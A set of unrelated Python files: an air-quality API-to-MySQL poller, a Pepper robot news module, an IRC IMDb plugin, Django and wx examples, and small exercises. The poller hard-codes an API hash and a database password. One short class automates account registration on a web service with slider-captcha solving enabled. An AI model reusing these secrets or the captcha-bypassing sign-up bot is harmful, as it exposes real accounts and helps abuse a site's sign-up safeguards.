        14000018_Minute_Average table definition (device id, location,
        time fields, particulates, gases, VOC, weather, noise, position).
    """
    values = (self.uRAD,self.location, self.Time_Str_Minute, self.Year,self.Month,
    self.Day, self.Hour, self.Minute, self.Particulate_Matter_PM1, self.Particulate_Matter_PM25,
    self.Particulate_Matter_PM10,
    self.Ozone_O3_ppm, self.Nitrogen_Dioxide_NO2_ppm, self.Sulfer_Dioxide_SO2_ppm,
    self.Carbon_Monoxide_CO_ppm,self.VOC,self.Temperature,self.Pressure,self.Humidity,self.Noise,self.latitude,self.longitude)
    return values
def get_insert_query(self):
    """Return the parameterized INSERT statement for the
    14000018_Minute_Average table (22 %s placeholders).
    """
    # Plain string literal; the original used an f-string that contained
    # no interpolation fields.
    query = """INSERT INTO 14000018_Minute_Average VALUES (%s,%s, %s, %s, %s,%s,%s, %s, %s, %s, %s, %s, %s, %s,%s,%s,%s,%s,%s,%s,%s,%s)"""
    return query
class Minute_1C_SQL_Writer_API_updating_one:
    """Writes one minute-average record from uRAD device 1400001C to MySQL.

    Parses a JSON record (dict) from the uRAD API into typed columns and
    inserts them into the 1400001C_Minute_Average table.
    """

    # (attribute name, key in the API record) for every measurement that is
    # coerced to float when possible; unconvertible values are kept as-is.
    # Replaces the original's 14 copy-pasted try/except blocks.
    _FLOAT_FIELDS = (
        ('Particulate_Matter_PM1', 'pm1'),
        ('Particulate_Matter_PM25', 'pm25'),
        ('Particulate_Matter_PM10', 'pm10'),
        ('Ozone_O3_ppm', 'gas1'),
        ('Nitrogen_Dioxide_NO2_ppm', 'gas2'),
        ('Sulfer_Dioxide_SO2_ppm', 'gas3'),
        ('Carbon_Monoxide_CO_ppm', 'gas4'),
        ('VOC', 'vocaqi'),
        ('Temperature', 'temperature'),
        ('Pressure', 'pressure'),
        ('Humidity', 'humidity'),
        ('Noise', 'noise'),
        ('latitude', 'latitude'),
        ('longitude', 'longitude'),
    )

    def __init__(self, df, cursor, connection):
        """Load data from a JSON record.

        Args:
            df (dict): one record from the uRAD API; must contain the time
                fields 'Year', 'Month', 'Day', 'Hour' and 'minute'.
            cursor: DB-API cursor used for the INSERT.
            connection: open database connection (used to commit).

        Raises:
            TypeError, ValueError: when a required time field is missing or
                not integer-like (same behaviour as the original code).
        """
        self.cursor = cursor
        self.conn = connection
        self.uRAD = '1400001C'
        self.location = 'River Terrace'
        self.Time_Str_Minute = df.get('Time_Str', None)
        self.Year = int(df.get('Year', None))
        self.Month = int(df.get('Month', None))
        self.Day = int(df.get('Day', None))
        self.Hour = int(df.get('Hour', None))
        self.Minute = int(df.get('minute', None))
        # Measurements are optional and often arrive as strings.
        for attr, key in self._FLOAT_FIELDS:
            setattr(self, attr, self._to_float(df.get(key, None)))

    @staticmethod
    def _to_float(value):
        """Return value as float, or unchanged when not convertible."""
        try:
            return float(value)
        except (TypeError, ValueError):
            return value

    def insert(self):
        """Insert this record and commit.

        Database errors are printed and swallowed so one bad row does not
        stop the polling loop; the commit runs either way.
        """
        try:
            self.cursor.execute(self.get_insert_query(), self.get_values())
        except Exception as e:
            print(e)
        self.conn.commit()

    def get_values(self):
        """Return the 22 column values in table order."""
        return (self.uRAD, self.location, self.Time_Str_Minute, self.Year,
                self.Month, self.Day, self.Hour, self.Minute,
                self.Particulate_Matter_PM1, self.Particulate_Matter_PM25,
                self.Particulate_Matter_PM10, self.Ozone_O3_ppm,
                self.Nitrogen_Dioxide_NO2_ppm, self.Sulfer_Dioxide_SO2_ppm,
                self.Carbon_Monoxide_CO_ppm, self.VOC, self.Temperature,
                self.Pressure, self.Humidity, self.Noise,
                self.latitude, self.longitude)

    def get_insert_query(self):
        """Return the parameterized INSERT statement (22 placeholders)."""
        placeholders = ', '.join(['%s'] * 22)
        return 'INSERT INTO 1400001C_Minute_Average VALUES (%s)' % placeholders
class Minute_58_SQL_Writer_API_updating_one:
    """Writes one minute-average record from uRAD device 14000058 to MySQL.

    Parses a JSON record (dict) from the uRAD API into typed columns and
    inserts them into the 14000058_Minute_Average table.
    """

    # (attribute name, key in the API record) for every measurement that is
    # coerced to float when possible; unconvertible values are kept as-is.
    # Replaces the original's 14 copy-pasted try/except blocks.
    _FLOAT_FIELDS = (
        ('Particulate_Matter_PM1', 'pm1'),
        ('Particulate_Matter_PM25', 'pm25'),
        ('Particulate_Matter_PM10', 'pm10'),
        ('Ozone_O3_ppm', 'gas1'),
        ('Nitrogen_Dioxide_NO2_ppm', 'gas2'),
        ('Sulfer_Dioxide_SO2_ppm', 'gas3'),
        ('Carbon_Monoxide_CO_ppm', 'gas4'),
        ('VOC', 'vocaqi'),
        ('Temperature', 'temperature'),
        ('Pressure', 'pressure'),
        ('Humidity', 'humidity'),
        ('Noise', 'noise'),
        ('latitude', 'latitude'),
        ('longitude', 'longitude'),
    )

    def __init__(self, df, cursor, connection):
        """Load data from a JSON record.

        Args:
            df (dict): one record from the uRAD API; must contain the time
                fields 'Year', 'Month', 'Day', 'Hour' and 'minute'.
            cursor: DB-API cursor used for the INSERT.
            connection: open database connection (used to commit).

        Raises:
            TypeError, ValueError: when a required time field is missing or
                not integer-like (same behaviour as the original code).
        """
        self.cursor = cursor
        self.conn = connection
        self.uRAD = '14000058'
        self.location = 'River Terrace'
        self.Time_Str_Minute = df.get('Time_Str', None)
        self.Year = int(df.get('Year', None))
        self.Month = int(df.get('Month', None))
        self.Day = int(df.get('Day', None))
        self.Hour = int(df.get('Hour', None))
        self.Minute = int(df.get('minute', None))
        # Measurements are optional and often arrive as strings.
        for attr, key in self._FLOAT_FIELDS:
            setattr(self, attr, self._to_float(df.get(key, None)))

    @staticmethod
    def _to_float(value):
        """Return value as float, or unchanged when not convertible."""
        try:
            return float(value)
        except (TypeError, ValueError):
            return value

    def insert(self):
        """Insert this record and commit.

        Database errors are printed and swallowed so one bad row does not
        stop the polling loop; the commit runs either way.
        """
        try:
            self.cursor.execute(self.get_insert_query(), self.get_values())
        except Exception as e:
            print(e)
        self.conn.commit()

    def get_values(self):
        """Return the 22 column values in table order."""
        return (self.uRAD, self.location, self.Time_Str_Minute, self.Year,
                self.Month, self.Day, self.Hour, self.Minute,
                self.Particulate_Matter_PM1, self.Particulate_Matter_PM25,
                self.Particulate_Matter_PM10, self.Ozone_O3_ppm,
                self.Nitrogen_Dioxide_NO2_ppm, self.Sulfer_Dioxide_SO2_ppm,
                self.Carbon_Monoxide_CO_ppm, self.VOC, self.Temperature,
                self.Pressure, self.Humidity, self.Noise,
                self.latitude, self.longitude)

    def get_insert_query(self):
        """Return the parameterized INSERT statement (22 placeholders)."""
        placeholders = ', '.join(['%s'] * 22)
        return 'INSERT INTO 14000058_Minute_Average VALUES (%s)' % placeholders
class Minute_5A_SQL_Writer_API_updating_one:
    """Writes one minute-average record from uRAD device 1400005A to MySQL.

    Parses a JSON record (dict) from the uRAD API into typed columns and
    inserts them into the 1400005A_Minute_Average table.

    Fixes over the original:
    - the PM1 conversion referenced ``Particulate_Matter_PM1`` without
      ``self.`` — the NameError was silently swallowed by a bare except, so
      PM1 was never converted to float;
    - the VOC float conversion was missing entirely (present in the sibling
      device classes).
    """

    # (attribute name, key in the API record) for every measurement that is
    # coerced to float when possible; unconvertible values are kept as-is.
    _FLOAT_FIELDS = (
        ('Particulate_Matter_PM1', 'pm1'),
        ('Particulate_Matter_PM25', 'pm25'),
        ('Particulate_Matter_PM10', 'pm10'),
        ('Ozone_O3_ppm', 'gas1'),
        ('Nitrogen_Dioxide_NO2_ppm', 'gas2'),
        ('Sulfer_Dioxide_SO2_ppm', 'gas3'),
        ('Carbon_Monoxide_CO_ppm', 'gas4'),
        ('VOC', 'vocaqi'),
        ('Temperature', 'temperature'),
        ('Pressure', 'pressure'),
        ('Humidity', 'humidity'),
        ('Noise', 'noise'),
        ('latitude', 'latitude'),
        ('longitude', 'longitude'),
    )

    def __init__(self, df, cursor, connection):
        """Load data from a JSON record.

        Args:
            df (dict): one record from the uRAD API; must contain the time
                fields 'Year', 'Month', 'Day', 'Hour' and 'minute'.
            cursor: DB-API cursor used for the INSERT.
            connection: open database connection (used to commit).

        Raises:
            TypeError, ValueError: when a required time field is missing or
                not integer-like (same behaviour as the original code).
        """
        self.cursor = cursor
        self.conn = connection
        self.uRAD = '1400005A'
        self.location = 'River Terrace'
        self.Time_Str_Minute = df.get('Time_Str', None)
        self.Year = int(df.get('Year', None))
        self.Month = int(df.get('Month', None))
        self.Day = int(df.get('Day', None))
        self.Hour = int(df.get('Hour', None))
        self.Minute = int(df.get('minute', None))
        # Measurements are optional and often arrive as strings.
        for attr, key in self._FLOAT_FIELDS:
            setattr(self, attr, self._to_float(df.get(key, None)))

    @staticmethod
    def _to_float(value):
        """Return value as float, or unchanged when not convertible."""
        try:
            return float(value)
        except (TypeError, ValueError):
            return value

    def insert(self):
        """Insert this record and commit.

        Database errors are printed and swallowed so one bad row does not
        stop the polling loop; the commit runs either way.
        """
        try:
            self.cursor.execute(self.get_insert_query(), self.get_values())
        except Exception as e:
            print(e)
        self.conn.commit()

    def get_values(self):
        """Return the 22 column values in table order."""
        return (self.uRAD, self.location, self.Time_Str_Minute, self.Year,
                self.Month, self.Day, self.Hour, self.Minute,
                self.Particulate_Matter_PM1, self.Particulate_Matter_PM25,
                self.Particulate_Matter_PM10, self.Ozone_O3_ppm,
                self.Nitrogen_Dioxide_NO2_ppm, self.Sulfer_Dioxide_SO2_ppm,
                self.Carbon_Monoxide_CO_ppm, self.VOC, self.Temperature,
                self.Pressure, self.Humidity, self.Noise,
                self.latitude, self.longitude)

    def get_insert_query(self):
        """Return the parameterized INSERT statement (22 placeholders)."""
        placeholders = ', '.join(['%s'] * 22)
        return 'INSERT INTO 1400005A_Minute_Average VALUES (%s)' % placeholders
def API_New_Data(API_string):
    """Fetch the most recent sample for one device from the uRAD API.

    Args:
        API_string (str): full device endpoint URL, e.g.
            'https://data.uradmonitor.com/api/v1/devices/<id>/all/'.

    Returns:
        dict: the newest record, augmented with parsed time fields
        ('Time_Str', 'Year', 'Month', 'Day', 'Hour', 'minute').
    """
    # NOTE(review): API credentials are hard-coded; move them to config.
    API_header = {"X-User-id": '5517', "X-User-hash":"5c14f499c252f325c6dc43811bdce283"}
    r= requests.get(API_string, headers=API_header)
    r= r.json()
    # Takes the last element as the newest sample; assumes the API returns
    # records ordered oldest-to-newest -- TODO confirm.
    new_API_data = r[-1]
    _time = new_API_data.get('time')
    # Preprocessing_uRAD_API_min (defined earlier in this file) splits the
    # raw time value into a display string plus calendar components.
    time_list = Preprocessing_uRAD_API_min(_time)
    new_API_data.update({'Time_Str': time_list[0],'Year':time_list[1],'Month':time_list[2],'Day':time_list[3],'Hour':time_list[4],'minute':time_list[5]})
    return new_API_data
#### Step 3 Operation Part ###################################################################################################################################################################################################
# Connect to the database.
# NOTE(review): credentials are hard-coded in source; move them to a config
# file or environment variables.
connection = pymysql.connect(host='127.0.0.1',  # local machine; 'localhost' also works
                             port=3306,
                             db='freshairdata',
                             user='freshairdc',
                             password='C8<CuFAFW7Vi<LUL',
                             cursorclass=pymysql.cursors.DictCursor)
# From our connection we need a cursor, which acts as our interface into the
# database.  (The original created the cursor twice; once is enough.)
cur = connection.cursor()

# Device id -> writer class for every uRAD unit we poll; replaces five
# copy-pasted try/except blocks.
_WRITERS = (
    ('1400001A', Minute_1A_SQL_Writer_API_updating_one),
    ('1400001C', Minute_1C_SQL_Writer_API_updating_one),
    ('14000018', Minute_18_SQL_Writer_API_updating_one),
    ('14000058', Minute_58_SQL_Writer_API_updating_one),
    ('1400005A', Minute_5A_SQL_Writer_API_updating_one),
)

# Poll forever: every `second` seconds (defined earlier in this file) fetch
# the newest sample per device and write it to that device's table.  Each
# device is handled best-effort so one failing endpoint does not block the
# others.
while True:
    try:
        time.sleep(second)
        for device_id, writer_cls in _WRITERS:
            try:
                record = API_New_Data('https://data.uradmonitor.com/api/v1/devices/%s/all/' % device_id)
                writer_cls(record, cur, connection).insert()
            except Exception:
                # Skip this device for this cycle.
                pass
    except Exception:
        pass
|
#! /usr/bin/env python
# -*- encoding: UTF-8 -*-
import time
from Modules.module import ModuleBaseClass
from Applications.RSSNewsHandler import RSSNewsHandler
import re
class NewsModule(ModuleBaseClass):
    """
    Pepper robot module that shows a news page on the tablet and reads RSS
    headlines aloud, driven by dialog topics and tablet button events.
    (Python 2 / NAOqi code.)
    """
    def __init__(self, app, name, pepper_ip):
        """
        Initialisation of module and event detection.
        """
        # Folder name on Pepper that holds this module's web assets
        folder_name = "newsModule"
        # Superclass init call
        super(NewsModule, self).__init__(app, name, pepper_ip, folder_name)
        self.rss = RSSNewsHandler()
        # Subscribe to events raised in dialog or on button click
        self.exit_subscriber = self.memory.subscriber("exit_button_clicked")
        self.exit_id = self.exit_subscriber.signal.connect(self.click_exit_button)
        self.news_click_subscriber = self.memory.subscriber("news_clicked")
        self.news_click_id = self.news_click_subscriber.signal.connect(self.click_news_button)

    def display_on_tablet(self, full_file_name):
        """
        Display file on Pepper's tablet
        :param full_file_name: file name including file ending
        """
        super(NewsModule, self).display_on_tablet(full_file_name)

    def run(self):
        """
        Initiate dialog upon method call. Run until finished, then shutoff.
        """
        self.module_finished = False
        # Subscribe to the news dialog topic
        self.news_topic = self.dialog.loadTopic("/home/nao/News_enu.top")
        self.dialog.activateTopic(self.news_topic)
        self.dialog.subscribe(self.name)
        full_file_name = "news.html"
        self.display_on_tablet(full_file_name)
        # Poll until an exit event flips module_finished (see click_exit_button)
        while not self.module_finished:
            time.sleep(1)
        self.shutoff()

    def shutoff(self, *_args):
        """
        Shutoff and unsubscribe from events.

        Each teardown step is attempted independently so that one failure
        does not prevent the others from running.
        """
        try:
            self.tablet.hideWebview()
            print "Tabletview stopped"
        except:
            pass
        try:
            self.tts.resetSpeed()
            print "Speech speed reset"
        except:
            pass
        try:
            self.dialog.deactivateTopic(self.news_topic)
            self.dialog.unloadTopic(self.news_topic)
            self.dialog.unsubscribe(self.name)
            print "Stopped news dialog"
        except RuntimeError:
            pass
        except AttributeError:
            # news_topic does not exist if run() was never called
            pass

    def click_news_button(self, news_clicked):
        """
        Callback for tablet news-button events; reads one random article.
        """
        print "Entered clickNewsButton with value %s" % news_clicked
        self.say_random_news(news_clicked)

    def click_exit_button(self, *_args):
        # Exit callback: hide the page, say goodbye, end run()'s wait loop.
        self.tablet.hideWebview()
        self.tts.say('That was the news with me, Pepper')
        self.module_finished = True

    def say_random_news(self, site_key):
        """
        Fetch a random article for site_key, then speak its title and
        (except for 'fox') its summary.
        """
        # Slow the speech down slightly for readability
        self.tts.setParameter("speed", 85)
        news_article = self.rss.get_random_news(site_key)
        # Strip HTML tags before speaking
        self.tts.say(re.sub('<[^<]+?>', '', news_article.title))
        time.sleep(1)
        if site_key != 'fox':
            self.tts.say(re.sub('<[^<]+?>', '', news_article.summary.split('<div')[0])) # Reuters trick
        self.tts.resetSpeed()
|
from BusinessLogicLayer.cluster.master import ActionMasterGeneral
class ActionMxCloud(ActionMasterGeneral):
    """Registration action for the mxyssr.me service.

    Delegates all work to ActionMasterGeneral, pre-configured with this
    site's registration URL, a life cycle of 2 and slider-captcha solving
    enabled ('anti_slider').
    """
    def __init__(self, register_url='https://www.mxyssr.me/auth/register', silence=True):
        super(ActionMxCloud, self).__init__(register_url=register_url, silence=silence, life_cycle=2,
        hyper_params={'anti_slider': True})

if __name__ == '__main__':
    # action_speed(ActionMxCloud, power=1, silence=True)
    # run() is inherited from ActionMasterGeneral.
    ActionMxCloud(silence=False).run()
|
import linecache
import time
def ascii_art():
    """Print the 7-line banner stored in ascii.txt, one line per 0.1 s.

    Reads from 'ascii.txt' in the current working directory; linecache
    returns '' for missing lines/files, so the function never raises.
    """
    # Renamed local: the original variable shadowed the function name.
    art_file = "ascii.txt"
    # linecache numbers lines from 1; the original range(0, 7) wasted its
    # first iteration on the always-empty "line 0" and printed only the
    # first 6 lines of the banner.
    for line_no in range(1, 8):
        print(linecache.getline(art_file, line_no), end="")
        time.sleep(0.1)
    print("\n")
|
from time import time
# Longest-Collatz-sequence search (Project Euler #14 style): find the
# starting number below one million with the longest Collatz chain.
# NOTE(review): Python 2 syntax (print statement, integer '/'); under
# Python 3, `s/2` must become `s//2` to stay an integer.
start = time()
l_dic = {}
for i in range(3,1000000):
    s = i
    s_list = [s]
    # Walk the Collatz sequence from i down to 1, recording every step.
    while s != 1:
        if s%2 == 0:
            s = s/2
        else:
            s = 3*s + 1
        s_list.append(s)
    # Record the chain length for this starting value.
    l_dic[i] = len(s_list)
# Print the (start, length) pair with the greatest length, then timing.
print sorted(l_dic.items(), key=lambda x:x[1], reverse = True)[0]
print "1 : Seconds", time() - start
|
class FactorCalculator:
    """Utility for divisibility checks."""

    @staticmethod
    def test_factor(x, y):
        """Return True if x is a factor of y (y is divisible by x).

        The original lacked @staticmethod, so instance calls bound the
        instance to `x` and broke; the decorator fixes instance calls while
        keeping direct class-level calls working.
        """
        return y % x == 0

#print(FactorCalculator.test_factor(4, 1024))
|
from django import forms
from django.shortcuts import render, HttpResponse
from django.shortcuts import redirect
from django.http import HttpResponseRedirect
from .models import Details
#from .forms import CreateNewList
# Create your views here.
def index(request):
    """Contact-us view: saves a submitted contact record, lists all
    records, and removes duplicate phone numbers.

    NOTE(review): duplicates are deleted *after* `data` is serialized, so
    the rendered page can still show rows removed in the same request.
    """
    # Getting data from the HTML form and accepting it on POST.
    # NOTE(review): request.POST[...] raises KeyError for a missing field;
    # a Django Form would validate this properly.
    if request.method == 'POST':
        #form = Details(request.POST)
        name = request.POST['name']
        email = request.POST['email']
        phone = request.POST['phone']
        comment = request.POST['comment']
        #Creating the Object of record every time user clicks on 'Add Data'
        '''
        if form.isvalid():
            return redirect('/success/')
        '''
        obj = Details()
        obj.name = name
        obj.email = email
        obj.phone = phone
        obj.comment = comment
        obj.save()
    #Fetching the details and saving them in a dictionary
    from django.core import serializers
    data = serializers.serialize("python",Details.objects.all())
    #Dictionary to store the data and send it back to the template
    context = {
        'data':data,
    }
    # Drop duplicate phone numbers: each delete lowers the remaining count,
    # so the last surviving row per phone number is kept.
    for row in Details.objects.all():
        if Details.objects.filter(phone=row.phone).count() > 1:
            row.delete()
    #return HttpResponseRedirect("/sample")
    '''
    if request.method == 'POST':
        myfunc()
    '''
    return render(request, 'contact_us.html', context)
def self(request):
    """Render the landing page.

    NOTE(review): the function name `self` clashes with the conventional
    method-receiver name; consider renaming (e.g. `home`) together with
    the URL configuration.
    """
    return render(request, 'index.html')
def about(request):
    """Render the static about-us page."""
    return render(request, 'about_us.html')
def sample(request):
    """Render the static sample page."""
    return render(request, 'sample.html')
def myfunc():
    """Redirect helper to /sample.

    NOTE(review): only referenced from commented-out code above.
    """
    return HttpResponseRedirect('/sample')
|
"""This example adds a nice status bar to a SketchWindow frame"""
import wx
from SketchWindow import SketchWindow
class SketchFrame(wx.Frame):
    """Frame hosting a SketchWindow plus a three-field status bar that
    tracks mouse position, current-line point count and total line count.
    """
    def __init__(self, parent):
        wx.Frame.__init__(self, parent, -1, "Sketch Frame",
                size=(800, 600))
        self.sketch = SketchWindow(self, -1)
        # Observe mouse motion over the canvas so the bar stays current.
        self.sketch.Bind(wx.EVT_MOTION, self.OnSketchMotion)
        self.statusbar = self.CreateStatusBar()
        self.statusbar.SetFieldsCount(3)
        # Negative widths are proportional: fields get 1/6, 2/6, 3/6.
        self.statusbar.SetStatusWidths([-1,-2,-3])

    def OnSketchMotion(self, event):
        # NOTE(review): GetPositionTuple is classic-wxPython API; under
        # Phoenix this would be GetPosition -- confirm the wx version used.
        statuses = [
            "Pos: %s" % str(event.GetPositionTuple()),
            "current Pts: %s" % len(self.sketch.curLine),
            "Line Count: %s" % len(self.sketch.lines) ]
        for i, status in enumerate(statuses):
            self.statusbar.SetStatusText(status, i)
        event.Skip() # Pass the event on so other handlers see it too
if __name__ == "__main__":
    # NOTE(review): wx.PySimpleApp is the legacy (pre-Phoenix) bootstrap;
    # modern wxPython uses wx.App(False).
    app = wx.PySimpleApp()
    frame = SketchFrame(None)
    frame.Show(True)
    app.MainLoop()
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.datasets import load_breast_cancer
# Fix: these two classifiers were used below without being imported,
# raising NameError at runtime.
from sklearn.tree import DecisionTreeClassifier
from xgboost import XGBClassifier

# Load the Wisconsin breast-cancer dataset (a sklearn Bunch).
cancer = load_breast_cancer()
type(cancer)
cancer.keys()
cancer['data']
type(cancer['data'])
cancer['target']
cancer['target_names']
print(cancer['DESCR'])
print(cancer['feature_names'])
print(cancer['filename'])
# Combine features and target into a single DataFrame.
df = pd.DataFrame(np.c_[cancer['data'],cancer['target']],columns=np.append(cancer['feature_names'],['target']))
df.head()
df.isnull().sum()#so we dont have nan values
# pair plot of sample features
sns.pairplot(df, hue = 'target',
             vars = ['mean radius', 'mean texture', 'mean perimeter', 'mean area', 'mean smoothness'] )
sns.countplot(df['target'])#using this graph we can see that 0 is malignant
plt.figure(figsize=(20,8))
sns.countplot(df['mean radius'])
# Train/test split and feature scaling.
X = df.drop(['target'],axis=1)
y = df['target']
from sklearn.model_selection import train_test_split
X_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.2,random_state=5)
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train_sc = sc.fit_transform(X_train)
X_test_sc = sc.transform(X_test)
from sklearn.metrics import confusion_matrix,classification_report,accuracy_score
# Decision tree on scaled features.
dt2 = DecisionTreeClassifier(criterion = 'entropy', random_state = 51)
dt2.fit(X_train_sc, y_train)
y_pred_dt_sc = dt2.predict(X_test_sc)
accuracy_score(y_test, y_pred_dt_sc)
# XGBoost on scaled features.
xgb_classifier2 = XGBClassifier()
xgb_classifier2.fit(X_train_sc, y_train)
y_pred_xgb_sc = xgb_classifier2.predict(X_test_sc)
accuracy_score(y_test, y_pred_xgb_sc)
|
"""Given two lists. concatenate them (that is, combine them into a single list).
For example, given [1, 2] and [3, 4]:
>>> concat_lists([1, 2], [3, 4])
[1, 2, 3, 4]
It should work if either list is empty:
>>> concat_lists([], [1, 2])
[1, 2]
>>> concat_lists([1, 2], [])
[1, 2]
>>> concat_lists([], [])
[]
"""
def concat_lists(list1, list2):
    """Return a new list with the items of list1 followed by list2."""
    combined = [*list1, *list2]
    return combined
# Primes below 100 via trial division over every smaller candidate.
primes = [n for n in range(2, 100) if all(n % d != 0 for d in range(2, n))]
print(primes)
# Numeric weather-condition code -> Chinese description.
# NOTE(review): mapping appears to follow the common Chinese weather-API
# code table (0=clear ... 53=haze) -- confirm against the data source.
wth = {
    0: '晴',
    1: '多云',
    2: '阴',
    3: '阵雨',
    4: '雷阵雨',
    5: '雷阵雨伴有冰雹',
    6: '雨夹雪',
    7: '小雨',
    8: '中雨',
    9: '大雨',
    10: '暴雨',
    11: '大暴雨',
    12: '特大暴雨',
    13: '阵雪',
    14: '小雪',
    15: '中雪',
    16: '大雪',
    17: '暴雪',
    18: '雾',
    19: '冻雨',
    20: '沙尘暴',
    21: '小到中雨',
    22: '中到大雨',
    23: '大到暴雨',
    24: '暴雨到大暴雨',
    25: '大暴雨到特大暴雨',
    26: '小到中雪',
    27: '中到大雪',
    28: '大到暴雪',
    29: '浮尘',
    30: '扬沙',
    31: '强沙尘暴',
    53: '霾'
}
# Exact compass bearings (degrees) -> Chinese direction names.
windDirect = {
    0: '北风', 45: '东北风', 90: '东风', 135: '东南风',
    180: '南风', 225: '西南风', 270: '西风', 315: '西北'
}

# (lower, upper, label) for bearings strictly between two named points;
# both bounds are exclusive, matching the original comparisons.
_BETWEEN_DIRECTIONS = (
    (0, 45, '北偏东'), (45, 90, '东偏北'), (90, 135, '东偏南'),
    (135, 180, '南偏东'), (180, 225, '南偏西'), (225, 270, '西偏南'),
    (270, 315, '西偏北'), (315, 360, '北偏西'),
)

def windDri(win):
    """Translate a wind bearing in degrees into its Chinese name.

    Exact multiples of 45 map to a named compass point; bearings between
    two points get an "X leaning Y" label.  Returns None for values
    outside [0, 360) that are not exact keys.
    """
    if win in windDirect:
        return windDirect[win]
    for low, high, label in _BETWEEN_DIRECTIONS:
        if low < win < high:
            return label
    return None
def windlevel(speed):
    """Map a wind speed (m/s) to its Beaufort-style Chinese label.

    Speeds at or below 0.2 m/s are "微风" (light air); speeds above
    132 m/s fall outside the table and yield None.
    """
    if speed <= 0.2:
        return "微风"
    # Upper bound (inclusive) of each level, in ascending order.
    levels = (
        (1.5, "1级"), (3.3, "2级"), (5.4, "3级"), (7.9, "4级"),
        (10.7, "5级"), (13.8, "6级"), (17.1, "7级"), (20.7, "8级"),
        (24.4, "9级"), (28.4, "10级"), (32.6, "11级"), (132, "12级以上"),
    )
    for upper, label in levels:
        if speed <= upper:
            return label
    return None
|
###
# Copyright (c) 2013, jbub
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import re
import supybot.ircmsgs as ircmsgs
import supybot.callbacks as callbacks
try:
from supybot.i18n import PluginInternationalization
_ = PluginInternationalization('Imdb')
except ImportError:
_ = lambda x:x
from .api import choices
URL_REGEX = re.compile('http:\/\/www\.imdb\.com\/title\/tt(\d+)\/?')
def create_api(plugin):
    """Instantiate the IMDb API backend configured for *plugin*.

    Args:
        plugin: the supybot plugin; its 'apiName' registry value selects
            the backend from `choices`.

    Raises:
        ValueError: if the configured name is not a known backend.
    """
    api = plugin.registryValue('apiName')
    # Idiomatic membership test (was: `if not api in choices`).
    if api not in choices:
        raise ValueError('Invalid api provided!')
    return choices[api](plugin=plugin)
class Imdb(callbacks.Plugin):
    """Supybot plugin that replies with IMDb title information whenever an
    http://www.imdb.com/title/tt<id> link appears in a channel message.
    """
    threaded = True

    def doPrivmsg(self, irc, msg):
        """Scan channel messages (including /me actions) for IMDb title
        links and reply via the configured API backend, once per distinct
        title id.
        """
        # Ignore CTCP messages that are not ACTIONs.
        if ircmsgs.isCtcp(msg) and not ircmsgs.isAction(msg):
            return
        channel = msg.args[0]
        if irc.isChannel(channel):
            if ircmsgs.isAction(msg):
                text = ircmsgs.unAction(msg)
            else:
                text = msg.args[1]
            # set() dedupes a link repeated within one message.
            movies = set(URL_REGEX.findall(text))
            if movies:
                api = create_api(plugin=self)
                for mid in movies:
                    api.reply(irc, mid)

Class = Imdb
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
# -*- coding: utf-8 -*-
#
# Date: 17 September 2018
# Author: Alexandre Frazao Rosario
# Patricio Domingues
#
# Module Full Description:
# FDRI is an image analysis module that focuses on finding human faces in images,
# as well as finding images that contain a specific person. It provides this functionality by appealing to AI Convolutional Neural Networks.
# The executable is an implementation of facial detection and recognition with the Dlib DNN (http://dlib.net/).
#
# The facial recognition element is activated by selecting a folder with images of the person that
# the program should look for; if that person is found in an image, the image is marked as an interesting file hit.
#
# All the detectors used can be found at: https://github.com/davisking/dlib-models
#
#====================================================================
# License Apache 2.0
#====================================================================
# Copyright 2018 Alexandre Frazão Rosário
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import json
from datetime import datetime
import os # file checking
import shutil # file copy
import subprocess # .exe calling
import time
import signal
import hashlib
import xml.dom.minidom as m_dom
import jarray
from java.awt import BorderLayout, GridLayout, FlowLayout, Dimension
from java.awt.event import KeyAdapter, KeyEvent, KeyListener
from threading import Thread
from distutils.dir_util import copy_tree
# Java librarys
from java.io import File
from java.lang import System
from java.lang import Thread as JThread
from java.util.logging import Level
# UI librarys
from javax.swing import (BorderFactory, BoxLayout, JButton, JCheckBox,
JComponent, JFileChooser, JFrame, JLabel, JPanel,
JScrollPane, JTextField, JToolBar)
from javax.swing.event import DocumentEvent, DocumentListener
from org.sleuthkit.autopsy.casemodule import Case
from org.sleuthkit.autopsy.casemodule.services import (Blackboard, FileManager,
Services)
from org.sleuthkit.autopsy.coreutils import Logger
from org.sleuthkit.autopsy.datamodel import ContentUtils
# sleuthkit librarys
